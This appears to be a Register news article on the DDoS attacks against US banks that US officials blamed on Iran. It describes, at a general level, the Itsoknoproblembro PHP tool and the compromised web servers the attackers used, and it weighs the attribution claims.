Feeds

US gov blames Iran for cyberattacks on American banks

Itsoknoproblembro and the bRobots

High performance access to file storage

Denial-of-service attacks against US banks' web systems were the work of Iran rather than Islamic activists, says a former American government official.

A group called the Izz ad-Din al-Qassam Cyber Fighters claimed responsibility for two waves of cyber-attacks against US banks including US Bancorp, Bank of America, Citigroup, Wells Fargo that took place in September and December. The stated reason for the "protest" attacks was religious outrage over the continuing presence on YouTube of the inflammatory Innocence of Muslims video on YouTube.

James A Lewis of the Center for Strategic and International Studies in Washington told the New York Times that the attacks were actually the work of Iran, rather than outraged hacktivists. He reckons the aim was actually retaliation over the deployment of Stuxnet and other cyberweapons against Iran as well as economic sanctions.

Security researchers at Arbor Networks concluded last month that in both cases attack traffic was launched from insecure websites rather than malware-infected PCs. Compromised PHP web applications and insecure Wordpress installation were pressed into service as part of a PHP Web server botnet, controlled by tools such as bRobot.

The skill involved in putting together the attacks as well as the use of server based resources has apparently convinced US government official that a state-sponsored entity, namely Iran, rather than hacktivists are behind the attacks. "“There is no doubt within the US government that Iran is behind these attacks,” Lewis, a former official in the state and commerce departments, told the NYT. Lewis points to the volume of traffic involved in the US bank attacks (“multiple times” the amount that Russia directed at Estonia in 2007) in attempting to substantiate his arguments but as the NYT points out "American officials have not offered any technical evidence to back up their claims".

Security vendors are able to say that the attacks against US banks are fairly sophisticated but cannot pinpoint who developed them. “The scale, the scope and the effectiveness of these attacks have been unprecedented,” said Carl Herberger, vice president of security solutions at Israeli-based security firm Radware told the NYT. “There have never been this many financial institutions under this much duress.”

Researchers at Radware discovered that cloud services and public web hosting servers* had been infected with a strain of malware, called Itsoknoproblembro. "The malware has existed for years, but the banking attacks were the first time it used data centers to attack external victims," the NYT reports, adding that Itsoknoproblembro was designed to be difficult if not impossible to trace back to command and control systems. Attackers used infected servers to disgorge attack traffic at each banking site until it slowed or collapsed, according to Radware. Peak attack traffic against US banks hit 70 Gbps.

An entry on Radware's website that Itsoknoproblembro is a PHP-based hacker tool that has recently been customised to serve in DDoS attacks.

The 'itsoknoproblembro' tool was designed and implemented as a general purpose PHP script injected into a victim’s machine allowing the attacker to upload and execute arbitrary Perl scripts on the target’s machine.

The 'itsoknoproblembro' script injects an encrypted payload, in order to bypass IPS and Malware gateways into the website main file index.php, allowing the attacker to upload new Perl scripts at any time.

Initial server infection is usually done by using the well known Remote File Inclusion (RFI) technique. By uploading Perl scripts that run different DOS flood vectors, the server might act as a bot in a DDOS botnet army.

Although originally designed for general purpose, some variants of this tool found in the wild were customized to act as a proprietary DDOS tool, implementing the flood vector logics inside without the need to upload additional scripts.

DDoS protection service firm Prolexic launched a suite of SNORT rules and a log analysis tool to defend against itsoknoproblembro last week.

It also links the threat to attacks against the US banking industry. But the tool has also been used against the energy and hosting provider industries. "The attack vectors include POST, GET, TCP and UDP floods, with and without proxies, including a so-called Kamikaze GET flood script that can repeatedly relaunch automated attacks," according to a statement by Prolexic.

Using a cloud-based system to launch denial of service attacks rather than botnet networks of compromised PCs shows that whoever is behind the attacks is keeping up with the latest trends in technology. It's hardly evidence of state involvement, at least by itself. There's nothing in what either Prolexic, Radware or Arbor are saying to suggest the latest attacks are state-sponsored much less pointing the finger of blame towards Iran.

Nonetheless, unnamed US intelligence officials appear adamant that the Izz ad-Din al-Qassam Cyber Fighters is actually a cover for Iran. ®

Bootnote

Infected web servers are called bRobots by both Radware and Prolexic. This naming convention differentiates paned servers from the compromised PCs (zombies, bots or drones) in conventional botnet networks.

High performance access to file storage

More from The Register

next story
Obama allows NSA to exploit 0-days: report
If the spooks say they need it, they get it
Parent gabfest Mumsnet hit by SSL bug: My heart bleeds, grins hacker
Natter-board tells middle-class Britain to purée its passwords
Web data BLEEDOUT: Users to feel the pain as Heartbleed bug revealed
Vendors and ISPs have work to do updating firmware - if it's possible to fix this
OpenSSL Heartbleed: Bloody nose for open-source bleeding hearts
Bloke behind the cockup says not enough people are helping crucial crypto project
One year on: diplomatic fail as Chinese APT gangs get back to work
Mandiant says past 12 months shows Beijing won't call off its hackers
Call of Duty 'fragged using OpenSSL's Heartbleed exploit'
So it begins ... or maybe not, says one analyst
Experian subsidiary faces MEGA-PROBE for 'selling consumer data to fraudster'
US attorneys general roll up sleeves, snap on gloves
NSA denies it knew about and USED Heartbleed encryption flaw for TWO YEARS
Agency forgets it exists to protect communications, not just spy on them
prev story

Whitepapers

Mainstay ROI - Does application security pay?
In this whitepaper learn how you and your enterprise might benefit from better software security.
Five 3D headsets to be won!
We were so impressed by the Durovis Dive headset we’ve asked the company to give some away to Reg readers.
3 Big data security analytics techniques
Applying these Big Data security analytics techniques can help you make your business safer by detecting attacks early, before significant damage is done.
The benefits of software based PBX
Why you should break free from your proprietary PBX and how to leverage your existing server hardware.
Mobile application security study
Download this report to see the alarming realities regarding the sheer number of applications vulnerable to attack, as well as the most common and easily addressable vulnerability errors.